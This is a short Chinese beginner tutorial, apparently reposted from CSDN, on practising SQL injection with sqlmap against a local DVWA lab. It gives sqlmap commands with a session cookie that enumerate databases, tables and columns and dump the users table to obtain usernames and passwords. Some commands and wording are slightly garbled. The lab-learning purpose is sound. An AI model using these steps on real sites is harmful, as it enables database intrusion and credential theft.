菜鸟sql注入学习
一.工具
1.在虚拟机(windows10)中搭建dvwa靶场
2.安装SQLmap(前提是有python环境)
3.调试
二.初体验
1.打开靶场工具,输入用户名密码后登录进入靶场,按照下图选择难度,这里我选择最低级low
2.如下图,先选择sql注入模块,选择后在输入框随便输入数字,我输入的是321,记住红框的参数,后期用到。
三.开始实验
请打开sqlmap并检查sqlmap是否可用。尽快开始:
1. 列出数据库
sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –dbs –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl \’–dbs;
注:(http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit# 和PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl;security=low 将替换为上面红框中标记的参数。)等等。
-u 参数代表URL,指定连接目标。
dbs 表示目标中列出的数据库。
看这个图,第一个大红色框表示有一个注入点,第二个红色框表示有两个数据库(dvwa和information_schema)。
2. 列出数据表
sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl\’ -D dvwa –tables;
-D,指定数据库
tables,列出数据库中的所有表。
有两张桌子
3、查询表的结构
sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \”PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl; security=low\” -D dvwa -T users –columns
-T,指定表
columns 指定表中列出的所有列的名称和数据类型。
4、列出数据信息及多条数据
sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl; security=low\’ -D dvwa -T users –count
5 数据
5、显示所有查询到的数据条
sqlmap.py -u \’http://127.0.0.1/DVWA/vulnerability/sqli/?id=321Submit=Submit#\’ –cookie \’PHPSESSID=amiq02lr9j38mo4a9p8g5md5fl\’ -D dvwa -T users –dump
转储、列出数据
此时,您已经有了数据库用户名和密码。
我们欢迎任何沟通或更正。
以上关于#Newbie SQL注入学习的相关内容摘自网络,仅供大家参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92306.html